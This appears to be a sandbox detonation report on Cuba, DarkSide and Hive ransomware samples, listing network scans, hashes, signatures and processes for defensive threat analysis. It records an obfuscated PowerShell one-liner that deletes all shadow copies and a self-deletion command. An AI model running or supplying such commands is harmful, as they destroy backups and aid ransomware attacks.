N/A 10.127.255.81:445 tcp
N/A 10.127.255.86:445 tcp
N/A 10.127.255.91:445 tcp
N/A 10.127.255.75:445 tcp
N/A 10.127.255.92:445 tcp
N/A 10.127.255.85:445 tcp
N/A 10.127.255.87:445 tcp
N/A 10.127.255.98:445 tcp
N/A 10.127.255.68:445 tcp
N/A 10.127.255.80:445 tcp
N/A 10.127.255.93:445 tcp
N/A 10.127.255.67:445 tcp
N/A 10.127.255.70:445 tcp
N/A 10.127.255.100:445 tcp
N/A 10.127.255.113:445 tcp
N/A 10.127.255.69:445 tcp
N/A 10.127.255.94:445 tcp
N/A 10.127.255.107:445 tcp
N/A 10.127.255.112:445 tcp
N/A 10.127.255.99:445 tcp
N/A 10.127.255.101:445 tcp
N/A 10.127.255.73:445 tcp
N/A 10.127.255.66:445 tcp
N/A 10.127.255.78:445 tcp
N/A 10.127.255.82:445 tcp
N/A 10.127.255.110:445 tcp
N/A 10.127.255.96:445 tcp
N/A 10.127.255.76:445 tcp
N/A 10.127.255.105:445 tcp
N/A 10.127.255.108:445 tcp
N/A 10.127.255.115:445 tcp
N/A 10.127.255.77:445 tcp
N/A 10.127.255.89:445 tcp
N/A 10.127.255.84:445 tcp
N/A 10.127.255.97:445 tcp
N/A 10.127.255.71:445 tcp
N/A 10.127.255.109:445 tcp
N/A 10.127.255.90:445 tcp
N/A 10.127.255.114:445 tcp
N/A 10.127.255.74:445 tcp
N/A 10.127.255.88:445 tcp
N/A 10.127.255.111:445 tcp
N/A 10.127.255.79:445 tcp
N/A 10.127.255.166:445 tcp
N/A 10.127.255.178:445 tcp
N/A 10.127.255.150:445 tcp
N/A 10.127.255.174:445 tcp
N/A 10.127.255.145:445 tcp
N/A 10.127.255.120:445 tcp
N/A 10.127.255.143:445 tcp
N/A 10.127.255.123:445 tcp
N/A 10.127.255.160:445 tcp
N/A 10.127.255.163:445 tcp
N/A 10.127.255.173:445 tcp
N/A 10.127.255.128:445 tcp
N/A 10.127.255.152:445 tcp
N/A 10.127.255.121:445 tcp
N/A 10.127.255.142:445 tcp
N/A 10.127.255.122:445 tcp
N/A 10.127.255.164:445 tcp
N/A 10.127.255.179:445 tcp
N/A 10.127.255.124:445 tcp
N/A 10.127.255.169:445 tcp
N/A 10.127.255.125:445 tcp
N/A 10.127.255.130:445 tcp
N/A 10.127.255.165:445 tcp
N/A 10.127.255.177:445 tcp
N/A 10.127.255.158:445 tcp
N/A 10.127.255.129:445 tcp
N/A 10.127.255.170:445 tcp
N/A 10.127.255.175:445 tcp
N/A 10.127.255.136:445 tcp
N/A 10.127.255.138:445 tcp
N/A 10.127.255.140:445 tcp
N/A 10.127.255.176:445 tcp
N/A 10.127.255.134:445 tcp
N/A 10.127.255.172:445 tcp
N/A 10.127.255.133:445 tcp
N/A 10.127.255.153:445 tcp
N/A 10.127.255.141:445 tcp
N/A 10.127.255.137:445 tcp
N/A 10.127.255.151:445 tcp
N/A 10.127.255.148:445 tcp
N/A 10.127.255.146:445 tcp
N/A 10.127.255.131:445 tcp
N/A 10.127.255.167:445 tcp
N/A 10.127.255.180:445 tcp
N/A 10.127.255.156:445 tcp
N/A 10.127.255.139:445 tcp
N/A 10.127.255.159:445 tcp
N/A 10.127.255.157:445 tcp
N/A 10.127.255.116:445 tcp
N/A 10.127.255.171:445 tcp
N/A 10.127.255.162:445 tcp
N/A 10.127.255.117:445 tcp
N/A 10.127.255.127:445 tcp
N/A 10.127.255.161:445 tcp
N/A 10.127.255.168:445 tcp
N/A 10.127.255.147:445 tcp
N/A 10.127.255.132:445 tcp
N/A 10.127.255.154:445 tcp
N/A 10.127.255.119:445 tcp
N/A 10.127.255.126:445 tcp
N/A 10.127.255.144:445 tcp
N/A 10.127.255.118:445 tcp
N/A 10.127.255.135:445 tcp
N/A 10.127.255.155:445 tcp
N/A 10.127.255.149:445 tcp
N/A 10.127.255.236:445 tcp
N/A 10.127.255.211:445 tcp
N/A 10.127.255.229:445 tcp
N/A 10.127.255.243:445 tcp
N/A 10.127.255.185:445 tcp
N/A 10.127.255.197:445 tcp
N/A 10.127.255.186:445 tcp
N/A 10.127.255.218:445 tcp
N/A 10.127.255.239:445 tcp
N/A 10.127.255.207:445 tcp
N/A 10.127.255.209:445 tcp
N/A 10.127.255.217:445 tcp
N/A 10.127.255.237:445 tcp
N/A 10.127.255.238:445 tcp
N/A 10.127.255.183:445 tcp
N/A 10.127.255.246:445 tcp
N/A 10.127.255.234:445 tcp
N/A 10.127.255.216:445 tcp
N/A 10.127.255.251:445 tcp
N/A 10.127.255.226:445 tcp
N/A 10.127.255.235:445 tcp
N/A 10.127.255.191:445 tcp
N/A 10.127.255.223:445 tcp
N/A 10.127.255.210:445 tcp
N/A 10.127.255.230:445 tcp
N/A 10.127.255.203:445 tcp
N/A 10.127.255.221:445 tcp
N/A 10.127.255.225:445 tcp
N/A 10.127.255.212:445 tcp
N/A 10.127.255.250:445 tcp
N/A 10.127.255.198:445 tcp
N/A 10.127.255.249:445 tcp
N/A 10.127.255.199:445 tcp
N/A 10.127.255.215:445 tcp
N/A 10.127.255.248:445 tcp
N/A 10.127.255.214:445 tcp
N/A 10.127.255.190:445 tcp
N/A 10.127.255.202:445 tcp
N/A 10.127.255.228:445 tcp
N/A 10.127.255.220:445 tcp
N/A 10.127.255.222:445 tcp
N/A 10.127.255.181:445 tcp
N/A 10.127.255.219:445 tcp
N/A 10.127.255.184:445 tcp
N/A 10.127.255.205:445 tcp
N/A 10.127.255.194:445 tcp
N/A 10.127.255.196:445 tcp
N/A 10.127.255.244:445 tcp
N/A 10.127.255.192:445 tcp
N/A 10.127.255.204:445 tcp
N/A 10.127.255.240:445 tcp
N/A 10.127.255.242:445 tcp
N/A 10.127.255.187:445 tcp
N/A 10.127.255.206:445 tcp
N/A 10.127.255.231:445 tcp
N/A 10.127.255.227:445 tcp
N/A 10.127.255.182:445 tcp
N/A 10.127.255.189:445 tcp
N/A 10.127.255.201:445 tcp
N/A 10.127.255.247:445 tcp
N/A 10.127.255.193:445 tcp
N/A 10.127.255.241:445 tcp
N/A 10.127.255.208:445 tcp
N/A 10.127.255.200:445 tcp
N/A 10.127.255.233:445 tcp
N/A 10.127.255.195:445 tcp
N/A 10.127.255.224:445 tcp
N/A 10.127.255.232:445 tcp
N/A 10.127.255.188:445 tcp
N/A 10.127.255.213:445 tcp
N/A 10.127.255.245:445 tcp
N/A 10.127.255.253:445 tcp
N/A 10.127.255.254:445 tcp
N/A 10.127.255.252:445 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
N/A 10.127.0.147:445 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\ProgramData\R3ADM3.txt

MD5 e6f001fc98cb51a0429ca5dc95f6a950
SHA1 16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256 acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

N/A

Files

memory/2484-0-0x00000000003A0000-0x0000000000400000-memory.dmp

memory/2484-4-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt

MD5 69acb73a5829bdddc9a7cf322178c70f
SHA1 3cd71f6cc40c90322e027712403899db2976218b
SHA256 9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512 380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/2484-5968-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2484-8573-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2484-8574-0x0000000000400000-0x000000000046C000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240704-en

Max time kernel

147s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (127) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp

Files

memory/1796-0-0x0000000000600000-0x0000000000610000-memory.dmp

memory/3048-1-0x00007FFE83CF3000-0x00007FFE83CF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bdd4k2e.eu3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3048-7-0x000001952DCA0000-0x000001952DCC2000-memory.dmp

memory/3048-12-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

memory/3048-13-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

memory/3048-16-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

C:\Users\README.f0ea3e68.TXT

MD5 25d0b19a0ec34a39dfa3e177866f01a3
SHA1 a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256 f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512 ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/1796-27-0x0000000000600000-0x0000000000610000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5647a0da4edc301549f81d9015b8e9b8
SHA1 eda70ece2fc3923bdd6e17346b58e3dbcd07c858
SHA256 6b06c632900ca1b6e2ab120232c79a002c45d120c76cede99af97a16112c70be
SHA512 0731968ea61cde891b12110f6d933d3d93e7342eddf2e71d1cfa7eceff49c22778324c4a122423cbe62ad0d6fe342705c5557243bf45133688602a62efe78e5e

memory/1796-193-0x0000000000600000-0x0000000000610000-memory.dmp

memory/1796-200-0x0000000000600000-0x0000000000610000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

88s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
